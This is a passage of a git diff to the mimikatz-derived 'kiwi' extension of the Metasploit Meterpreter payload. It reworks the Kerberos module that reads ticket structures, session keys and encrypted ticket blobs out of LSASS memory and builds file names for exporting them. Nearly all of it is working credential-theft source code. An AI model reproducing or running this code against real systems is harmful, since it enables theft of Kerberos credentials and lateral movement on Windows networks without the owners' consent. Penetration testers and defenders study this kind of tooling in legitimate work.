KRB_NT_SRV_HST)) && (ticket->ServiceName->NameCount > 1); - if(pName) + if (buffer = (wchar_t *)LocalAlloc(LPTR, charCount * sizeof(wchar_t))) { - if(aLocalBuffer.address = LocalAlloc(LPTR, sizeof(KERB_EXTERNAL_NAME) - sizeof(UNICODE_STRING))) + if (isLong) + isLong = swprintf_s(buffer, charCount, L"[%x;%x]-%1u-%u-%08x-%wZ@%wZ-%wZ.%s", LogonId->HighPart, LogonId->LowPart, grp, index, ticket->TicketFlags, &ticket->ClientName->Names[0], &ticket->ServiceName->Names[0], &ticket->ServiceName->Names[1], ext) > 0; + else + isLong = swprintf_s(buffer, charCount, L"[%x;%x]-%1u-%u-%08x.%s", LogonId->HighPart, LogonId->LowPart, grp, index, ticket->TicketFlags, ext) > 0; + + if (isLong) + kull_m_file_cleanFilename(buffer); + else + buffer = (wchar_t *)LocalFree(buffer); + } + return buffer; +} + +PKIWI_KERBEROS_TICKET kuhl_m_sekurlsa_kerberos_createTicket(PBYTE pTicket, PKULL_M_MEMORY_HANDLE hLSASS) +{ + BOOL status = FALSE; + PKIWI_KERBEROS_TICKET ticket; + + if (ticket = (PKIWI_KERBEROS_TICKET)LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET))) + { + ticket->StartTime = *(PFILETIME)(pTicket + kerbHelper[KerbOffsetIndex].offsetStartTime); + ticket->EndTime = *(PFILETIME)(pTicket + kerbHelper[KerbOffsetIndex].offsetEndTime); + ticket->RenewUntil = *(PFILETIME)(pTicket + kerbHelper[KerbOffsetIndex].offsetRenewUntil); + + ticket->ServiceName = *(PKERB_EXTERNAL_NAME *)(pTicket + kerbHelper[KerbOffsetIndex].offsetServiceName); + kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->ServiceName, hLSASS); + ticket->DomainName = *(PUNICODE_STRING)(pTicket + kerbHelper[KerbOffsetIndex].offsetDomainName); + kull_m_string_getUnicodeString(&ticket->DomainName, hLSASS); + + ticket->TargetName = *(PKERB_EXTERNAL_NAME *)(pTicket + kerbHelper[KerbOffsetIndex].offsetTargetName); + kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->TargetName, hLSASS); + ticket->TargetDomainName = *(PUNICODE_STRING)(pTicket + kerbHelper[KerbOffsetIndex].offsetTargetDomainName); + kull_m_string_getUnicodeString(&ticket->TargetDomainName, hLSASS); + + ticket->ClientName = *(PKERB_EXTERNAL_NAME *)(pTicket + kerbHelper[KerbOffsetIndex].offsetClientName); + kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->ClientName, hLSASS); + ticket->AltTargetDomainName = *(PUNICODE_STRING)(pTicket + kerbHelper[KerbOffsetIndex].offsetAltTargetDomainName); + kull_m_string_getUnicodeString(&ticket->AltTargetDomainName, hLSASS); + + ticket->Description = *(PUNICODE_STRING)(pTicket + kerbHelper[KerbOffsetIndex].offsetDescription); + kull_m_string_getUnicodeString(&ticket->Description, hLSASS); + + ticket->KeyType = *(PULONG)((pTicket + kerbHelper[KerbOffsetIndex].offsetKeyType)); + ticket->Key = *(PKIWI_KERBEROS_BUFFER)((pTicket + kerbHelper[KerbOffsetIndex].offsetKey));; + kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(&ticket->Key, hLSASS); + + ticket->TicketFlags = *(PULONG)((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketFlags)); + ticket->TicketEncType = *(PULONG)((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketEncType)); + ticket->TicketKvno = *(PULONG)((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketKvno)); + ticket->Ticket = *(PKIWI_KERBEROS_BUFFER)((pTicket + kerbHelper[KerbOffsetIndex].offsetTicket));; + kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(&ticket->Ticket, hLSASS); + } + return ticket; +} + +void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalName, PKULL_M_MEMORY_HANDLE hLSASS) +{ + BOOL status = FALSE; + KERB_EXTERNAL_NAME extName; + PKERB_EXTERNAL_NAME pTempName; + KULL_M_MEMORY_HANDLE hBuffer = { KULL_M_MEMORY_TYPE_OWN, NULL }; + KULL_M_MEMORY_ADDRESS aName = { *pExternalName, hLSASS }, aLocalBuffer = { &extName, &hBuffer };//, aLocalStrings = {NULL, &hBuffer}; + DWORD i; + + if (aName.address) + { + *pExternalName = NULL; + if (kull_m_memory_copy(&aLocalBuffer, &aName, sizeof(KERB_EXTERNAL_NAME)-sizeof(UNICODE_STRING))) { - if(kull_m_memory_copy(&aLocalBuffer, &aName, sizeof(KERB_EXTERNAL_NAME) - sizeof(UNICODE_STRING))) + i = sizeof(KERB_EXTERNAL_NAME)+(sizeof(UNICODE_STRING)* (extName.NameCount - 1)); + if (pTempName = (PKERB_EXTERNAL_NAME)LocalAlloc(LPTR, i)) { - count = ((PKERB_EXTERNAL_NAME) aLocalBuffer.address)->NameCount; - type = ((PKERB_EXTERNAL_NAME) aLocalBuffer.address)->NameType; - - kprintf(L"(%02hu) : ", type); - buffSize = count * sizeof(UNICODE_STRING); - - if(names = (PUNICODE_STRING) LocalAlloc(LPTR, buffSize)) - { - aLocalStrings.address = names; - aName.address = (PBYTE) aName.address + sizeof(KERB_EXTERNAL_NAME) - sizeof(UNICODE_STRING); - if(kull_m_memory_copy(&aLocalStrings, &aName, buffSize)) - { - for(i = 0; i < count; i++) - { - kull_m_string_getUnicodeString(&names[i], cLsass->hLsassMem); - kprintf(L"%wZ ; ", &names[i]); - LocalFree(names[i].Buffer); - } - } - LocalFree(names); - } + *pExternalName = pTempName; + aLocalBuffer.address = pTempName; + if (status = kull_m_memory_copy(&aLocalBuffer, &aName, i)) + for (i = 0; status && (i < pTempName->NameCount); i++) + status = kull_m_string_getUnicodeString(&pTempName->Names[i], hLSASS); } - LocalFree(aLocalBuffer.address); } } - else kprintf(L"( /) : "); - - kull_m_string_getUnicodeString(pDomain, cLsass->hLsassMem); - kprintf(L"@ %wZ", pDomain); - LocalFree(pDomain->Buffer); } -void kuhl_m_sekurlsa_kerberos_time(IN PFILETIME pFileTime) +void kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer, PKULL_M_MEMORY_HANDLE hLSASS) { - SYSTEMTIME st; - wchar_t buffer[255]; - if(FileTimeToLocalFileTime(pFileTime, pFileTime) && FileTimeToSystemTime(pFileTime, &st )) + BOOL status = FALSE; + KULL_M_MEMORY_HANDLE hBuffer = { KULL_M_MEMORY_TYPE_OWN, NULL }; + KULL_M_MEMORY_ADDRESS aBuffer = { pBuffer->Value, hLSASS }, aLocalBuffer = { NULL, &hBuffer }; + + pBuffer->Value = NULL; + if (aBuffer.address) { - if(GetDateFormat(LOCALE_USER_DEFAULT, 0, &st, NULL, buffer, sizeof(buffer) / sizeof(wchar_t))) + if (aLocalBuffer.address = LocalAlloc(LPTR, pBuffer->Length)) { - kprintf(L"%s ", buffer); - if(GetTimeFormat(LOCALE_USER_DEFAULT, 0, &st, NULL, buffer, sizeof(buffer) / sizeof(wchar_t))) - kprintf(L"%s ; ", buffer); + pBuffer->Value = (PUCHAR)aLocalBuffer.address; + kull_m_memory_copy(&aLocalBuffer, &aBuffer, pBuffer->Length); } } } + +void kuhl_m_sekurlsa_kerberos_freeTicket(PKIWI_KERBEROS_TICKET ticket) +{ + if (ticket) + { + kuhl_m_sekurlsa_kerberos_freeExternalName(ticket->ServiceName); + kull_m_string_freeUnicodeStringBuffer(&ticket->DomainName); + kuhl_m_sekurlsa_kerberos_freeExternalName(ticket->TargetName); + kull_m_string_freeUnicodeStringBuffer(&ticket->TargetDomainName); + kuhl_m_sekurlsa_kerberos_freeExternalName(ticket->ClientName); + kull_m_string_freeUnicodeStringBuffer(&ticket->AltTargetDomainName); + kull_m_string_freeUnicodeStringBuffer(&ticket->Description); + kuhl_m_sekurlsa_kerberos_freeKiwiKerberosBuffer(&ticket->Key); + kuhl_m_sekurlsa_kerberos_freeKiwiKerberosBuffer(&ticket->Ticket); + LocalFree(ticket); + } +} + +void kuhl_m_sekurlsa_kerberos_freeExternalName(PKERB_EXTERNAL_NAME pName) +{ + DWORD i; + if (pName) + { + for (i = 0; i < pName->NameCount; i++) + kull_m_string_freeUnicodeStringBuffer(&pName->Names[i]); + LocalFree(pName); + } +} + +void kuhl_m_sekurlsa_kerberos_freeKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer) +{ + if (pBuffer->Value) + LocalFree(pBuffer->Value); +} \ No newline at end of file diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h index d39ece2b..296e3e83 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h @@ -5,6 +5,8 @@ */ #pragma once #include "../kuhl_m_sekurlsa.h" +#include "../../kerberos/khul_m_kerberos_ticket.h" +#include "../modules/kull_m_file.h" KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package; @@ -13,9 +15,18 @@ NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[]); void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData); BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData); -void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN PVOID tickets); -void kuhl_m_sekurlsa_kerberos_names(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PKERB_EXTERNAL_NAME pName, IN PUNICODE_STRING pDomain); -void kuhl_m_sekurlsa_kerberos_time(IN PFILETIME pFileTime); +void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData); +void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile); + +wchar_t * kuhl_m_sekurlsa_kerberos_generateFileName(PLUID LogonId, const DWORD grp, const DWORD index, PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext); + +PKIWI_KERBEROS_TICKET kuhl_m_sekurlsa_kerberos_createTicket(PBYTE pTicket, PKULL_M_MEMORY_HANDLE hLSASS); +void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalName, PKULL_M_MEMORY_HANDLE hLSASS); +void kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer, PKULL_M_MEMORY_HANDLE hLSASS); + +void kuhl_m_sekurlsa_kerberos_freeTicket(PKIWI_KERBEROS_TICKET ticket); +void kuhl_m_sekurlsa_kerberos_freeExternalName(PKERB_EXTERNAL_NAME pName); +void kuhl_m_sekurlsa_kerberos_freeKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer); typedef struct _KERB_INFOS { @@ -39,6 +50,7 @@ typedef struct _KERB_INFOS LONG offsetRenewUntil; LONG offsetTicketEncType; LONG offsetTicket; + LONG offsetTicketKvno; SIZE_T structTicketSize; } KERB_INFOS, *PKERB_INFOS; @@ -122,11 +134,6 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION PUNICODE_STRING pinCode; // not only PIN (CSP Info) } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; -typedef struct _KIWI_KERBEROS_BUFFER { - ULONG Length; - PUCHAR Value; -} KIWI_KERBEROS_BUFFER, *PKIWI_KERBEROS_BUFFER; - typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_51 { LIST_ENTRY This; PVOID unk0; @@ -158,7 +165,7 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_51 { PVOID strangeNames; ULONG unk12; ULONG TicketEncType; - ULONG unk13; + ULONG TicketKvno; KIWI_KERBEROS_BUFFER Ticket; } KIWI_KERBEROS_INTERNAL_TICKET_51, *PKIWI_KERBEROS_INTERNAL_TICKET_51; @@ -191,7 +198,7 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_52 { PVOID strangeNames; ULONG unk9; ULONG TicketEncType; - ULONG unk10; + ULONG TicketKvno; KIWI_KERBEROS_BUFFER Ticket; } KIWI_KERBEROS_INTERNAL_TICKET_52, *PKIWI_KERBEROS_INTERNAL_TICKET_52; @@ -225,6 +232,6 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 { PVOID strangeNames; ULONG unk9; ULONG TicketEncType; - ULONG unk10; + ULONG TicketKvno; KIWI_KERBEROS_BUFFER Ticket; } KIWI_KERBEROS_INTERNAL_TICKET_6, *PKIWI_KERBEROS_INTERNAL_TICKET_6;